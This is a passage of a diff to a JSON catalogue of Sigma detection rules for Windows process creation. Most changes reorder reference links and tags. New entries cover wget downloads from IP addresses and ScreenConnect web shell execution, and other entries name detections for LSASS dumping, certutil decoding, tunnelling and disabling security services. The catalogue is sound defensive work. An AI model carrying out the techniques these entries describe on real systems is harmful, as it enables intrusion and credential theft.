"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml" ], "tags": [ @@ -64915,11 +65030,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", - "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1105/T1105.md#atomic-test-18---curl-download-file", "https://twitter.com/max_mal_/status/1542461200797163522", + "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt", + "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_susp_download.yml" ], "tags": [ @@ -64985,9 +65100,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", - "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_all_execution.yml" ], "tags": [ @@ -65021,17 +65136,17 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow", - "https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4", - "https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf", - "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware", - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", "https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/", "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", + "https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4", + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware", + "https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml" ], "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ] }, @@ -65171,8 +65286,8 @@ "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", - "https://www.intrinsec.com/apt27-analysis/", "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.intrinsec.com/apt27-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml" ], "tags": [ @@ -65289,9 +65404,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage", "https://lolbas-project.github.io/lolbas/Binaries/Tar/", "https://unit42.paloaltonetworks.com/chromeloader-malware/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tar_compression.yml" ], "tags": [ @@ -65320,6 +65435,29 @@ "uuid": "418a3163-3247-4b7b-9933-dcfcb7c52ea9", "value": "Compressed File Creation Via Tar.EXE" }, + { + "description": "Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe", + "meta": { + "author": "Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2024/02/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wget_download_susp_locations.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.gnu.org/software/wget/manual/wget.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wget_download_susp_locations.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "40aa399c-7b02-4715-8e5f-73572b493f33", + "value": "Suspicious File Download From IP Via Wget.EXE - Paths" + }, { "description": "Detects suspicious Plink tunnel port forwarding to a local port", "meta": { @@ -65409,9 +65547,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://badoption.eu/blog/2023/01/31/code_c2.html", - "https://code.visualstudio.com/docs/remote/tunnels", "https://ipfyx.fr/post/visual-studio-code-tunnel/", + "https://code.visualstudio.com/docs/remote/tunnels", + "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml" ], "tags": [ @@ -65445,8 +65583,8 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5", - "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", "https://lolbas-project.github.io/lolbas/Binaries/Verclsid/", + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" ], "tags": [ @@ -65479,9 +65617,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/", "https://twitter.com/tccontre18/status/1480950986650832903", "https://twitter.com/mrd0x/status/1461041276514623491", + "https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml" ], "tags": [ @@ -65549,8 +65687,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/", "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml" @@ -65585,9 +65723,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/mrd0x/status/1511415432888131586", "https://twitter.com/mrd0x/status/1511489821247684615", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/", + "https://twitter.com/mrd0x/status/1511415432888131586", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml" ], "tags": [ @@ -65661,9 +65799,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://twitter.com/frack113/status/1555830623633375232", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml" ], "tags": [ @@ -65697,11 +65835,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md", "https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt", "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html", - "https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_usage.yml" ], "tags": [ @@ -65743,9 +65881,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", - "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", + "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_subfolder_search.yml" ], "tags": [ @@ -65995,8 +66133,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.reconinfosec.com/emergence-of-akira-ransomware-group", "https://github.com/cloudflare/cloudflared", + "https://blog.reconinfosec.com/emergence-of-akira-ransomware-group", "https://developers.cloudflare.com/cloudflare-one/connections/connect-apps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_tunnel_run.yml" ], @@ -66046,12 +66184,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/JohnLaTwC/status/835149808817991680", + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", + "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil", - "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", - "https://twitter.com/JohnLaTwC/status/835149808817991680", - "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_decode.yml" ], "tags": [ @@ -66084,8 +66222,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", "https://github.com/antonioCoco/RogueWinRM", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml" @@ -66120,8 +66258,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/Gerenios/AADInternals", "https://o365blog.com/aadinternals/", + "https://github.com/Gerenios/AADInternals", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" ], "tags": [ @@ -66217,8 +66355,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/", "https://docs.microsoft.com/en-us/azure/dns/dns-zones-records", + "https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml" ], @@ -66433,6 +66571,40 @@ "uuid": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", "value": "Suspicious Child Process Of SQL Server" }, + { + "description": "Detects potential web shell execution from the ScreenConnect server process.", + "meta": { + "author": "Jason Rathbun (Blackpoint Cyber)", + "creation_date": "2024/02/26", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_remote_access_tools_screenconnect_webshell.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8", + "https://blackpointcyber.com/resources/blog/breaking-through-the-screen/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_webshell.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190" + ] + }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "b19146a3-25d4-41b4-928b-1e2a92641b1b", + "value": "Remote Access Tool - ScreenConnect Server Web Shell Execution" + }, { "description": "Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", "meta": { @@ -66446,8 +66618,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nas_bench/status/1535431474429808642", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/", + "https://twitter.com/nas_bench/status/1535431474429808642", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml" ], "tags": [ @@ -66659,8 +66831,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://learn.microsoft.com/en-us/windows/package-manager/winget/source", + "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_susp_custom_source.yml" ], "tags": [ @@ -66728,9 +66900,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", "https://github.com/fireeye/DueDLLigence", + "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" ], "tags": [ @@ -67018,8 +67190,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_execution.yml" ], "tags": [ @@ -67053,9 +67225,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/", - "https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md", "https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841", + "https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md", + "https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/", "https://github.com/S3cur3Th1sSh1t/WinPwn", "https://grep.app/search?q=winpwn&filter[repo][0]=redcanaryco/atomic-red-team", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_winpwn.yml" @@ -67183,9 +67355,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://badoption.eu/blog/2023/01/31/code_c2.html", - "https://code.visualstudio.com/docs/remote/tunnels", "https://ipfyx.fr/post/visual-studio-code-tunnel/", + "https://code.visualstudio.com/docs/remote/tunnels", + "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_execution.yml" ], "tags": [ @@ -67218,8 +67390,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/6", "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md", + "https://github.com/OTRF/detection-hackathon-apt29/issues/6", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml" ], "tags": [ @@ -67310,10 +67482,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html", - "https://atomicredteam.io/defense-evasion/T1220/", - "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", "https://twitter.com/mattifestation/status/986280382042595328", + "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", + "https://atomicredteam.io/defense-evasion/T1220/", + "https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml" ], "tags": [ @@ -67472,8 +67644,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/", "https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/", + "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml" ], "tags": [ @@ -67529,10 +67701,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", - "https://twitter.com/JohnLaTwC/status/1415295021041979392", "https://vms.drweb.fr/virus/?i=24144899", "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1", + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", + "https://twitter.com/JohnLaTwC/status/1415295021041979392", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_disable_sec_services.yml" ], "tags": [ @@ -67624,8 +67796,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml" ], "tags": [ @@ -67646,7 +67818,7 @@ "value": "Exports Registry Key To a File" }, { - "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline", + "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.\nAn example would be a threat actor creating a new user via the net command and providing the password inline\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022/09/14", @@ -67659,9 +67831,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", + "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml" ], "tags": [ @@ -67856,8 +68029,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml" ], "tags": [ @@ -67892,8 +68065,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html", + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml" ], "tags": [ @@ -67990,8 +68163,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-", "https://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml", + "https://docs.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml" ], "tags": [ @@ -68034,9 +68207,9 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", - "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml" ], "tags": [ @@ -68071,10 +68244,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", - "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" ], "tags": [ @@ -68141,12 +68314,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", "https://github.com/Hackndo/lsassy", - "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", - "https://github.com/helpsystems/nanodump", + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", "https://github.com/CCob/MirrorDump", + "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", + "https://github.com/helpsystems/nanodump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml" ], "tags": [ @@ -68245,8 +68418,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/bopin2020/status/1366400799199272960", "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://twitter.com/bopin2020/status/1366400799199272960", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_createdump_lolbin_execution.yml" ], "tags": [ @@ -68357,9 +68530,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml" ], @@ -68426,13 +68599,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8", "https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699", "https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450", "https://github.com/vletoux/pingcastle", - "https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8", - "https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1", "https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/", "https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680", + "https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml" ], "tags": [ @@ -68465,13 +68638,13 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/_felamos/status/1204705548668555264", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", + "https://twitter.com/_felamos/status/1204705548668555264", "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml" ], "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ] }, @@ -68500,9 +68673,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://user-images.githubusercontent.com/61026070/136518004-b68cce7d-f9b8-4e9a-9b7b-53b1568a9a94.png", - "https://github.com/vmware/open-vm-tools/blob/master/open-vm-tools/tools.conf", "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", + "https://github.com/vmware/open-vm-tools/blob/master/open-vm-tools/tools.conf", + "https://user-images.githubusercontent.com/61026070/136518004-b68cce7d-f9b8-4e9a-9b7b-53b1568a9a94.png", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" ], "tags": [ @@ -68656,8 +68829,8 @@ "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", "https://twitter.com/jseerden/status/1247985304667066373/photo/1", - "https://twitter.com/lefterispan/status/1286259016436514816", "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", + "https://twitter.com/lefterispan/status/1286259016436514816", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml" ], "tags": [ @@ -68757,10 +68930,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 